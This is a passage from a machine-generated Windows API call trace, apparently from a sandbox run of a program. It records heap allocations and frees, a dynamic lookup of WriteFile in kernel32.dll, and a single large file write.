out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0169.136] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0169.136] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0169.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0169.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0169.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0169.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0169.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0169.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0169.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0169.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0169.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0169.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0169.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0169.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0169.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0169.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.147] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0169.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba570, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0169.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.148] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0169.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0169.148] WriteFile (in: hFile=0x138, lpBuffer=0xa6b008*, nNumberOfBytesToWrite=0x138f3, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesWritten=0x87eae0*=0x138f3, lpOverlapped=0x0) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0169.149] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0169.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | 